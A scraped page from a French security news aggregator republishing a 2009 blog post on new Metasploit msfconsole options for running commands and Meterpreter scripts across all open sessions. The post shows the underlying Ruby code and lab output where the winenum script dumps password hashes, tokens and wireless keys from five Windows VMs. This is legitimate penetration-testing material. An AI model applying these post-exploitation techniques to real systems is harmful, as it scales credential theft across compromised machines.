Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

New Options in Msfconsole Sessions Command

Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

S'abonner au fil RSS global de la revue de presse



New Options in Msfconsole Sessions Command

Par Blog
Le [2009-12-28] à 13:44:52



Présentation : Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time. Here is the output of the sessions command showing all options, the c for the command execution and the s for script execution. msf exploit handler sessions -h Usage sessions options Active session manipulation and interaction. OPTIONS -K Terminate all sessions. -c Run a command on all live sessions -d Detach an interactive session -h Help banner. -i Interact with the supplied session identifier. -k Terminate session. -l List all active sessions. -q Quiet mode. -s Run a script on all live meterpreter sessions -v List verbose fields. msf exploit handler Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP. msf exploit handler sessions -l Active sessions Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.235 4444 - 192.168.1.138 50441 2 Meterpreter 192.168.1.235 4444 - 192.168.1.138 54920 3 Meterpreter 192.168.1.235 4444 - 192.168.1.138 1396 4 Meterpreter 192.168.1.235 4444 - 192.168.1.138 61686 5 Meterpreter 192.168.1.235 4444 - 192.168.1.138 57197 msf exploit handler Another very useful option that was added is the v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler. msf exploit handler sessions -v Active sessions Id Description Tunnel Via -- ----------- ------ --- 1 Meterpreter 192.168.1.235 4444 - 192.168.1.138 50441 multi handler 2 Meterpreter 192.168.1.235 4444 - 192.168.1.138 54920 multi handler 3 Meterpreter 192.168.1.235 4444 - 192.168.1.138 1396 multi handler 4 Meterpreter 192.168.1.235 4444 - 192.168.1.138 61686 multi handler 5 Meterpreter 192.168.1.235 4444 - 192.168.1.138 57197 multi handler msf exploit handler Here is the code that is executed when the c option is ran 1 cmds.each do cmd 2 framework.sessions.each_sorted do s 3 session framework.sessions.get s 4 print_status Running ' cmd ' on session s session.tunnel_peer 5 if session.type meterpreter 6 c,args cmd. split ' ', 2 7 begin 8 process session.sys.process.execute c, args, 9 'Channelized' true , 10 'Hidden' true 11 12 rescue Rex Post Meterpreter RequestError 13 print_error Failed .class 14 15 end 16 print_line process.channel.read if process and process.channel 17 elsif session.type shell 18 Then it's a regular shell, just send the command 19 to the session's stdin. 20 session.write_shell cmd n 21 read_shell blocks with no timeout, so we wrap 22 it in a select in case there is no output 23 from the command 24 if select session.rstream , nil , nil ,3 25 output session.read_shell 26 print_line output 27 end 28 end 29 If the session isn't a meterpreter or shell type, it 30 could be a VNC session which can't run commands or 31 something custom which we don't know how to run 32 commands on , so don't bother. 33 end 34 end As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells msf exploit handler sessions -c hostname Running 'hostname' on session 1 192.168.1.138 50441 winxplab01 Running 'hostname' on session 2 192.168.1.138 54920 win2k3lab01 Running 'hostname' on session 3 192.168.1.138 1396 win701 Running 'hostname' on session 4 192.168.1.138 61686 winvis01 Running 'hostname' on session 5 192.168.1.138 57197 WIN-YR4V852V71Y msf exploit handler Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies. For example msf exploit handler sessions -c 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' Running 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' on session 1 192.168.1.138 50441 REG.EXE VERSION 3.0 HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion ProductName REG_SZ Microsoft Windows XP Running 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' on session 2 192.168.1.138 54920 HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion ProductName REG_SZ Microsoft Windows Server 2003 Running 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' on session 3 192.168.1.138 1396 HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion ProductName REG_SZ Windows 7 Enterprise Running 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' on session 4 192.168.1.138 61686 HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion ProductName REG_SZ Windows Vista TM Enterprise Running 'reg query HKLM SOFTWARE Microsoft Windows NT CurrentVersion v ProductName' on session 5 192.168.1.138 57197 HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion ProductName REG_SZ Windows Server R 2008 Enterprise msf exploit handler The s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are Proper logging of data will become very important do to the possibility that a large number of shells are processed. Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls. Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver. Scripts should at least output the hostname so the attacker can now what host he is currently running the script against. At the moment the script must run without options. Here is the code executed when executing this option 1 if not script. nil 2 print_status Running script script on all meterpreter sessions ... 3 framework.sessions.each_sorted do s 4 if session framework.sessions.get s 5 if session.type meterpreter 6 print_status Session s session.tunnel_peer 7 begin 8 client session 9 client.execute_script script, binding 10 rescue Exception e 11 log_error Error executing script e.class e 12 end 13 end 14 end 15 end 16 else 17 print_error No script specified 18 end As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with. Here is a summarized version of running winenum 1 msf exploit handler sessions -s winenum 2 Running script winenum on all meterpreter sessions ... 3 Session 1 192.168.1.138 50441 4 Running Windows Local Enumerion Meterpreter Script 5 New session on 192.168.1.138 50441... 6 Saving report to home carlos .msf3 logs winenum WINXPLAB01_20091225.4410-04411 WINXPLAB01_20091225.4410-04411.txt 7 Checking if WINXPLAB01 is a Virtual Machine ........ 8 BIOS Check Failed 9 This is a VMWare virtual Machine 10 Running Command List ... 11 running command cmd.exe c set 12 running command ipconfig all 13 .......... 14 Running WMIC Commands .... 15 running command wmic computersystem list brief 16 .......... 17 Extracting software list from registry 18 Dumping and Downloading the Registry entries for Configured Wireless Networks 19 Exporting HKLM Software Microsoft WZCSVC Parameters Interfaces 20 Compressing key into cab file for faster download 21 Downloading wlan_20091225.4410-04411.cab to - home carlos .msf3 logs winenum WINXPLAB01_20091225.4410-04411 wlan_20091225.4410-04411.cab 22 Deleting left over files 23 Dumping password hashes... 24 Hashes Dumped 25 Getting Tokens... 26 All tokens have been processed 27 Done 28 Session 2 192.168.1.138 54920 29 Running Windows Local Enumerion Meterpreter Script 30 New session on 192.168.1.138 54920... 31 Saving report to home carlos .msf3 logs winenum WIN2K3LAB01_20091225.4538-95293 WIN2K3LAB01_20091225.4538-95293.txt 32 Checking if WIN2K3LAB01 is a Virtual Machine ........ 33 This is a VMware Workstation Fusion Virtual Machine 34 Running Command List ... 35 running command cmd.exe c set 36 .......... 37 Running WMIC Commands .... 38 running command wmic computersystem list brief 39 .......... 40 Extracting software list from registry 41 Dumping password hashes... 42 Hashes Dumped 43 Getting Tokens... 44 All tokens have been processed 45 Done 46 Session 3 192.168.1.138 1396 47 Running Windows Local Enumerion Meterpreter Script 48 New session on 192.168.1.138 1396... 49 Saving report to home carlos .msf3 logs winenum WIN701_20091225.4637-88208 WIN701_20091225.4637-88208.txt 50 Checking if WIN701 is a Virtual Machine ........ 51 This is a VMware Workstation Fusion Virtual Machine 52 Checking if UAC is enabled ... 53 UAC is Enabled 54 Running Command List ... 55 running command cmd.exe c set 56 .......... 57 Running WMIC Commands .... 58 running command wmic computersystem list brief 59 .......... 60 Extracting software list from registry 61 UAC is enabled, Wireless key Registry could not be dumped under current privileges 62 - Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System. 63 Getting Tokens... 64 Error Getting Tokens Rex TimeoutError Operation timed out. 65 Done 66 Session 4 192.168.1.138 61686 67 Running Windows Local Enumerion Meterpreter Script 68 New session on 192.168.1.138 61686... 69 Saving report to home carlos .msf3 logs winenum WINVIS01_20091225.4927-83932 WINVIS01_20091225.4927-83932.txt 70 Checking if WINVIS01 is a Virtual Machine ........ 71 This is a VMware Workstation Fusion Virtual Machine 72 Checking if UAC is enabled ... 73 UAC is Enabled 74 Running Command List ... 75 running command cmd.exe c set 76 .......... 77 Running WMIC Commands .... 78 running command wmic computersystem list brief 79 .......... 80 Extracting software list from registry 81 UAC is enabled, Wireless key Registry could not be dumped under current privileges 82 - Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System. 83 Getting Tokens... 84 All tokens have been processed 85 Done 86 Session 5 192.168.1.138 57197 87 Running Windows Local Enumerion Meterpreter Script 88 New session on 192.168.1.138 57197... 89 Saving report to home carlos .msf3 logs winenum WIN-YR4V852V71Y_20091225.5019-40179 WIN-YR4V852V71Y_20091225.5019-40179.txt 90 Checking if WIN-YR4V852V71Y is a Virtual Machine ........ 91 This is a VMware Workstation Fusion Virtual Machine 92 Running Command List ... 93 running command cmd.exe c set 94 .......... 95 Running WMIC Commands .... 96 running command wmic computersystem list brief 97 .......... 98 Extracting software list from registry 99 - Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System. 100 Getting Tokens... 101 All tokens have been processed 102 Done 103 msf exploit handler As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.




AddThis Social Bookmark Widget



Les derniers articles du site "Blog" :

- Malware Trends - Q1 2016
- Simplified DDoS Testing at Scale
- BreakingPoint Captures Real-World 2015 Application Trends
- ATI Minecraft
- Benchmarking Open Source SDN Controllers Are They Ready for Carrier-Grade Services
- The End of Days is Here for Network Blind Spots
- Ixia ATI Research Center Finds Multiple Security Vulnerabilities in IBM Tivoli Storage Manager FastBack
- Introducing PSAttack
- Mobile World Congress 2016 Recap
- Ixia Smarter Security at RSA 2016




S'abonner au fil RSS global de la revue de presse

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]



Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :